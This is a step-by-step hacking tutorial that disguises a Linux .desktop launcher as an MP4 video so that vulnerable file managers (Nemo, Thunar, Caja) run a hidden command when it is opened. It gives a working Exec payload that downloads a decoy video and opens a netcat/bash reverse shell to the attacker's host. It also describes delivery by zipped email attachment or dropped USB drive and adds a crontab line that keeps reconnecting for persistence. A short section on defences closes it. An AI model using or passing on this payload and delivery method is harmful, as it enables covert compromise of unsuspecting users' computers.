How To: Pop a Reverse Shell with a Video File by Exploiting Popular Linux File Managers

What appears to be an ordinary MP4 may have been designed by an attacker to compromise your Linux Mint operating system. Opening the file will indeed play the intended video, but it will also silently create a connection to the attacker's system.

Understanding the Attack

While this article uses Linux Mint as an example, the attack takes advantage of an issue in several Linux file managers. The below GIF demonstrates the attack.

Two files are being extracted in the GIF. The first (real_video.mp4) is a real MP4 of a movie trailer. The second file (fake_video.mp4) is a .desktop file, configured to look like an ordinary MP4 in this file manager. What we can't see in the GIF is the Netcat connection being made to the attacker's system when fake_video.mp4 opens. The target believes fake_video.mp4 is legitimate and has no idea the operating system was just compromised.

The .desktop file extension is used in Linux systems to create application launchers. Linux Mint users can list files in the /usr/share/applications/ directory for some examples of this.

$ ls -l /usr/share/applications/*.desktop

-rw-r--r-- 1 root root   125 Nov  4  2017 /usr/share/applications/apturl.desktop
-rw-r--r-- 1 root root  8754 Nov 28 04:55 /usr/share/applications/blueberry.desktop
-rw-r--r-- 1 root root  1383 Jan 11 11:41 /usr/share/applications/bluetooth-sendto.desktop
-rw-r--r-- 1 root root   363 Mar 21 09:45 /usr/share/applications/cinnamon2d.desktop
-rw-r--r-- 1 root root   448 Dec  6 05:22 /usr/share/applications/cinnamon-color-panel.desktop
-rw-r--r-- 1 root root   300 Dec  6 05:22 /usr/share/applications/cinnamon-control-center.desktop
-rw-r--r-- 1 root root   463 Mar 21 09:45 /usr/share/applications/cinnamon.desktop
-rw-r--r-- 1 root root   496 Dec  6 05:22 /usr/share/applications/cinnamon-display-panel.desktop
-rw-r--r-- 1 root root   200 Mar 21 09:45 /usr/share/applications/cinnamon-killer-daemon.desktop
-rw-r--r-- 1 root root   272 Mar 21 09:45 /usr/share/applications/cinnamon-menu-editor.desktop
-rw-r--r-- 1 root root   450 Dec  6 05:22 /usr/share/applications/cinnamon-network-panel.desktop
-rw-r--r-- 1 root root   504 Dec  6 05:22 /usr/share/applications/cinnamon-online-accounts-panel.desktop
-rw-r--r-- 1 root root 11580 Mar 21 09:45 /usr/share/applications/cinnamon-onscreen-keyboard.desktop
-rw-r--r-- 1 root root   504 Dec  6 05:22 /usr/share/applications/cinnamon-region-panel.desktop
-rw-r--r-- 1 root root   433 Dec 11 03:24 /usr/share/applications/cinnamon-screensaver.desktop
-rw-r--r-- 1 root root 12473 Mar 21 09:45 /usr/share/applications/cinnamon-settings-applets.desktop

...

-rw-r--r-- 1 root root   506 Dec 15  2017 /usr/share/applications/seahorse.desktop
-rw-r--r-- 1 root root 10609 Mar 26  2018 /usr/share/applications/simple-scan.desktop
-rw-r--r-- 1 root root  8996 May 10  2018 /usr/share/applications/synaptic.desktop
-rw-r--r-- 1 root root   518 Apr  3  2018 /usr/share/applications/system-config-printer.desktop
-rw-r--r-- 1 root root 10062 Mar 25 07:28 /usr/share/applications/thunderbird.desktop
-rw-r--r-- 1 root root   820 Nov 30 08:53 /usr/share/applications/timeshift-gtk.desktop
-rw-r--r-- 1 root root 11701 Aug  2  2017 /usr/share/applications/tomboy.desktop
-rw-r--r-- 1 root root  4493 Feb  6  2018 /usr/share/applications/transmission-gtk.desktop
-rw-r--r-- 1 root root  3617 Apr 10  2018 /usr/share/applications/vim.desktop
-rw-r--r-- 1 root root  9870 Oct  6  2018 /usr/share/applications/vlc.desktop
-rw-r--r-- 1 root root   992 Dec 10 11:48 /usr/share/applications/xdg-desktop-portal-gtk.desktop
-rw-r--r-- 1 root root  4526 Dec 11 06:10 /usr/share/applications/xed.desktop
-rw-r--r-- 1 root root  9762 Dec 11 06:12 /usr/share/applications/xplayer.desktop
-rw-r--r-- 1 root root  8056 Dec 11 06:15 /usr/share/applications/xreader.desktop
-rw-r--r-- 1 root root  5309 Dec 11 06:18 /usr/share/applications/xviewer.desktop
-rw-r--r-- 1 root root  3780 Dec 17 05:45 /usr/share/applications/yelp.desktop

Viewing this directory in Linux Mint's built-in file manager, Nemo, the very same .desktop files appear as clickable buttons.

Using cat on one of the operating system's legitimate .desktop files will display the following data.

$ cat /usr/share/applications/cinnamon-settings-calendar.desktop

[Desktop Entry]
Icon=cs-date-time
Exec=cinnamon-settings calendar
Type=Application
OnlyShowIn=X-Cinnamon;
Categories=Settings;

The most important lines to take note of are the Icon= and Exec= values. The Icon value is responsible for the icon used to represent the .desktop file. The Exec value is responsible for the command(s) executed when the target clicks the .desktop file. In this case, clicking the file executes the cinnamon-settings command with the calendar option. Clicking this file will open the "Date & Time" settings window.

An attacker can abuse this functionality to change how the .desktop file appears to the user and which program(s) launch when the file is clicked as it resides in the file manager.

• Don't Miss: Harden Sudo Passwords to Defend Against Hashcat Attacks

Which Operating Systems Are Affected?

There are several noteworthy desktop environments (DE) that are affected by this issue. They include: GNOME, Cinnamon, MATE, KDE, XFCE4, and LXDE. While this is far from a comprehensive list of available DEs, these are among the most popular.

Each DE uses a different file manager by default. For example, GNOME uses the Nautilus file manager, and KDE uses the Dolphin file manager. Neither of these file managers is vulnerable to this attack. But! Keep in mind — it's possible to install and use multiple file managers in a single operating system, much like having two different web browsers installed simultaneously. So a GNOME target with Nautilus installed may be using a different, vulnerable file manager.

The goal of this article is to shed some light on the vulnerability in Cinnamon's default file manager, Nemo. Nemo, like the Thunar file manager found in XFCE4 systems, is vulnerable to this attack.

In my short series of tests against popular operating systems, here's what I was able to determine, ordered in the following OS/DE/File-Manager format. Newer versions of each of the affected systems may also be vulnerable to the attack.

Unaffected Systems:

• Ubuntu 18.04/GNOME/Nautilus
• Debian 10/GNOME/Nautilus
• Elementary OS 5/Pantheon/Pantheon-Files
• Manjaro 18/KDE/Dolphin

Affected Systems:

• Linux Mint 19.2/Cinnamon/Nemo
• Xubuntu 18.04/XFCE4/Thunar
• Fedora 30/MATE/Caja
• MX Linux/XFCE4/Thunar

• Don't Miss: Using Ubuntu as Your Primary OS, Part 1

How to Identify if a Target's File Manager Is Vulnerable

Identifying if the target is using a vulnerable file manager is not an easy task, especially if the attacker knows nothing about the target's operating system. However, if the attacker shares a Wi-Fi network with the target, it would be possible to observe traffic transmitting to and from the operating system. The DNS requests for a Linux Mint operating system appear as follows.

Similarly, MX Linux operating systems use custom repositories as well (shown below) when fetching system updates.

Determining the DE or file manager may not be possible without the target sharing some identifiable information on social media or some other means. Be sure to leave tips and ideas for enumerating this information in the comments!

• Don't Miss: Sniff Wi-Fi Activity Without Connecting to a Target Router

Step 1: Install Python3 in Kali

We'll need to set up a simple HTTP server in Kali to host the real_video.mp4 file. When the target clicks on the fake_video.desktop, it will silently download and automatically play the real_video.mp4. As root, start by installing Python3 on your Kali system.

~# apt-get update && apt-get install python3

Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
python3 is already the newest version (3.7.2-1).
python3 set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

Then, use the mkdir command to create a temporary directory to store the attack files we're creating.

~# mkdir -p /tmp/pythonServer/videos

Then, change into the new videos directory.

~# cd /tmp/pythonServer/videos/

Step 2: Install YouTube-dl

YouTube-dl is a cross-platform command-line tool used to download YouTube videos. The version of youtube-dl in the Kali Linux repository is usually a bit outdated, so reference the GitHub repo for the latest version. Use the below command to install it.

~# curl -L https://yt-dl.org/downloads/latest/youtube-dl -o /usr/local/bin/youtube-dl

% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1709k  100 1709k    0     0  70872      0  0:00:24  0:00:24 --:--:--  406k

Then, give the new youtube-dl binary permissions to run on the system with the chmod command.

~# chmod a+rx /usr/local/bin/youtube-dl

Step 3: Download a YouTube Video

In real scenarios, relevant videos should be used to trick the target user into believing the fake_video file is, in fact, a real video. For demonstration purposes, I'll be using the rickroll.

~# youtube-dl --restrict-filenames -f 18 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'

[youtube] dQw4w9WgXcQ: Downloading webpage
[youtube] dQw4w9WgXcQ: Downloading video info webpage
[youtube] dQw4w9WgXcQ: Downloading js player vflptN-I_
[youtube] dQw4w9WgXcQ: Downloading js player vflptN-I_
[download] Destination: Rick_Astley_-_Never_Gonna_Give_You_Up_Official_Music_Video-dQw4w9WgXcQ.mp4
[download] 100% of 15.18MiB in 00:07

Step 4: Rename the Video (Optional)

The filename will likely consist of erroneous characters. For the sake of simplicity, rename the video file. Use the below mv command with the wildcard (*) to rename it.

~# mv Rick*.mp4 real_video.mp4

The ls command can then be used to view the directory's contents and the renamed file.

~# ls -l

-rw-r--r-- 1 root root 15915462 Dec 10 01:55 real_video.mp4

Step 5: Create the Payload

Use a preferred text editor like Gedit, Geany, Vim, or nano to create a new "fake_video.desktop" file. The below example uses nano.

~# nano fake_video.desktop

Then, copy the below text into the new file. The .desktop file extension is vital; the attack won't work without it.

#!/usr/bin/env xdg-open

[Desktop Entry]
Encoding=UTF-8
Name=fake_video.mp4
Exec=/usr/bin/wget 'http://192.168.1.XX/real_video.mp4' -O /tmp/real_video.mp4; /usr/bin/xdg-open /tmp/real_video.mp4; /usr/bin/mkfifo /tmp/f; /bin/nc 192.168.1.XX 1234 < /tmp/f | /bin/bash -i > /tmp/f 2>&1 &
Terminal=false
Type=Application
Icon=video-x-generic

Several commands are executed (Exec=) and concatenated into one line, separated by semi-colons. I'll break the one-liner into parts to better explain each command.

• /usr/bin/wget 'http://192.168.1.XX/real_video.mp4' -O /tmp/real_video.mp4; — Wget downloads the real_video.mp4 file from the attacker's system to the target's. It is saved (-O) to the /tmp directory with the same filename. Throughout the payload, change the 192.168.1.XX address to the IP address of the attacker's Kali system.
• /usr/bin/xdg-open /tmp/real_video.mp4; — The xdg-open command will open files with the target's operating system's preferred video player. If the target prefers VLC over MPV or another Linux video player, the real_video.mp4 will automatically play on VLC. Opening the video with the preferred media player will hopefully prevent the target from discovering the fake_video.desktop.
• /usr/bin/mkfifo /tmp/f; — Mkfifo will create a named pipe to redirect all of the following Netcat data to and from the attacker's system.
• /bin/nc 192.168.1.XX 1234 < /tmp/f | /bin/bash -i > /tmp/f 2>&1 & — Netcat and Bash are used (with the named pipe) to connect back to the attackers systems (remember to change the XX in the IP address here to that of the attacker's system). The port number (1234) is arbitrary and can be any number between 1 and 65535.

The Icon= image can be changed here. Icon filenames are found in the /usr/share/icons/Mint-Y/mimetypes/128/ directory. The file extension (.png) can be omitted when creating .desktop files, but it's not necessary. Any file in the /usr/share/icons/ directory can be used as a .desktop file icon. For example, text files (text-x-generic), ZIP files ( package-x-generic), and every other filetype with a supporting PNG in the icons/ directory is usable. There's a lot of room to be creative with social engineering attacks here (fake ZIP file shown below).

Change the fake_video.desktop file permissions with the chmod command to elevate its privileges.

~# chmod +x fake_video.desktop

The new permissions are verified by listing the directory contents. Notice the execute (-rwxr-xr-x) permissions.

~# ls -l

-rwxr-xr-x 1 root root      353 Apr 12 06:27 fake_video.desktop
-rw-r--r-- 1 root root 15915462 Dec 10 01:55 real_video.mp4

Step 6: Start the Python3 Server

Python3 will create a web server on port 80, making the real_video.mp4 in the directory available to everyone on the network. Alternatively, this web server can be set up on a virtual private server for remote targets.

~# python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

The Python3 terminal must remain open until the target clicks on the fake_video.desktop file. If the Python3 server is not accessible when the target opens the fake_video, no video will play, but the target's computer will still establish the Netcat connection.

Step 7: Start the Netcat Listener

Netcat will listen (-l) on every available IPv4 interface using port (-p) 1234. This port number is arbitrary, but remember to reflect the change in the fake_video.desktop Exec= command created in Step 5. The -vv will print a more verbose, detailed output. Verbose outputs can be helpful when debugging connections.

~# nc -vv -l -p 1234

Step 8: Deliver the Payload

With the Python3 and Netcat servers setup, the attacker can deliver fake_video.desktop to the target. I've outlined two simple delivery methods below, but this is far from an exhaustive list of attack vectors. Other tactics are possible if the attacker knows more about the target.

Option 1: Email Attachment

Email is a good file sharing vector. If the target's operating system has been discovered or it's known that Linux systems are deployed in the workplace email delivery will be an ideal option. In this scenario, compressing the file(s) with zip is necessary to bypass email clients and web browsers from displaying the .desktop file extension when sharing the file.

It may be desirable to include many .desktop payloads in the ZIP sent to the target for a convincing social engineering attack. Or, perhaps mixing real files in with fake_videos.

First, make sure zip is installed, as it isn't included in all versions of Kali.

~# apt-get install zip

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  zip
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 234 kB of archives.
After this operation, 623 kB of additional disk space will be used.
Fetched 234 kB in 6s (37.4kB/s)

Selecting previously unselected package zip.
(Reading database ... 175224 files and directories currently installed.)
Preparing to unpack .../zip_3.0-11+b1_amd64.deb ...
Unpacking zip (3.0-11+b1) ...
Setting up zip (3.0-11+b1) ...
Processing triggers for man-db (2.8.5-2) ...

While in the videos/ directory, use the below zip command to compress all of the files in the directory.

~# zip -r videos.zip ../videos/

  adding: ../videos/ (stored 0%)
  adding: ../videos/real_video.mp4 (deflated 0%)
  adding: ../videos/fake_video.desktop (deflated 33%)

Zip will recursively (-r) compress all of the files in the ../videos/ directory into a "videos.zip" file. When that's done, the videos.zip file can be emailed to the target(s).

Option 2: USB Drop

Readers may know I'm a fan of USB drop attacks. Nearly 50% of all USBs found in the wild are picked up, inserted into a computer, and inspected by unsuspecting targets. The lone USB is an excellent attack vector as it specifically targets the computer — an email attachment may be opened using the target's smartphone. When the target inserts the USB drive into his/her machine, Nemo will automatically attempt to mount it and display the fake_video.desktop as "fake_video.mp4" — so compressing the files won't be necessary.

For more on the science of targeted social engineering attacks, check out "Hack WPA2 Wi-Fi Passwords Using USB Dead Drops." Similarly, shared USBs in the workplace can be configured to mimic or clone real files on the USB and swap them with malicious payloads.

To perform a USB drop attack, start by inserting the USB drive intended for the target into the Kali system. Then, mount the USB drive and use the below cp command to copy the fake_video.desktop to the drive.

~# cp /tmp/pythonServer/videos/*.desktop /media/root/USB\ NAME\ HERE/

Then, eject the USB drive and leave it some place only the intended target(s) will find.

Step 9: Post-Exploitation (Persistence)

When the fake_video.desktop is clicked, it will establish a connection to the Netcat listener (shown below).

~# nc -vv -l -p 1234

listening on [any] 1234 ...
connect to [192.168.1.XX] from () [192.168.1.78] 37538

target_user@Linux-Mint:~$

At this point, it's usually a good idea to establish some degree of persistence in the target's computer. In the event the original Netcat connection is lost or terminated, it may be desirable to have some way of reconnecting to the compromised Linux Mint device. A simple form of persistence can be configured using crontab.

• Don't Miss Steal Ubuntu Passwords Without Any Cracking

Cron is a task scheduler found in Mint and Ubuntu operating systems. Cron jobs are often used by system administrators to automate repetitive tasks, such as creating weekly backups, and executing a specific task when the OS reboots.

To ensure Netcat is maintaining the connection back to the attacker's system, echo the below commands into crontab. These commands will instruct the Mint device to connect to the attacker's server every ten minutes.

echo '*/10 * * * *     /usr/bin/mkfifo /tmp/v; /bin/nc 192.168.1.XX 9999 < /tmp/v | /bin/bash -i > /tmp/v 2>&1 &' | crontab -

These are the same mkfifo and Netcat commands used in the fake_video.desktop payload in Step 5. To receive connections from the target's machine, start a new Netcat listener in the Kali system.

~# nc -vv -l -p 9999

As long as the target is connected to the same network, the compromised device will connect back to the Netcat listener every ten minutes. If the Netcat listener isn't up and running, the target computer will silently fail and try again at the next interval.

How to Protect Yourself Against .desktop Attacks

• File Managers — The Nemo and Thunar file managers found in Cinnamon and XFCE4 are vulnerable to this kind of attack. Try the Nautilus or Dolphin file managers instead. They can be installed using the below command.

~# apt-get install nautilus dolphin

After installing them, open the Preferred Applications settings.

Change the File Manager to "Files" with blue file icon, this is Nautilus.

Clicking on folders will now open the Nautilus file manager and not Nemo. The fake_video.desktop will appear in its true form when using this file manager.

• Sandboxes — It's possible to sandbox specific applications and processes with tools like Firejail. Firejail reduces the risk of security breaches by using lightweight visualization technology to isolate applications and restrict them to sandboxed (container) environments. The below GIF demonstrates opening an unsafe file in a heavily sandboxed environment.

For more on hardening Ubuntu-based operating systems like Linux Mint, check out "Using Ubuntu as Your Primary OS, Part 3 (Application Hardening & Sandboxing)."

• Right-Click — Double-clicking on random files is generally considered good practice. In the case of this attack, right-clicking on the files and attempting to open them with a particular program reveals the fake_video.mp4 is recommending text editors and not video players like VLC and MPV. That's because the operating system knows it's a .desktop file containing text.

Follow me on Twitter @tokyoneon_ and GitHub if you enjoyed this article. For all questions and concerns, feel free to message me or leave a comment below.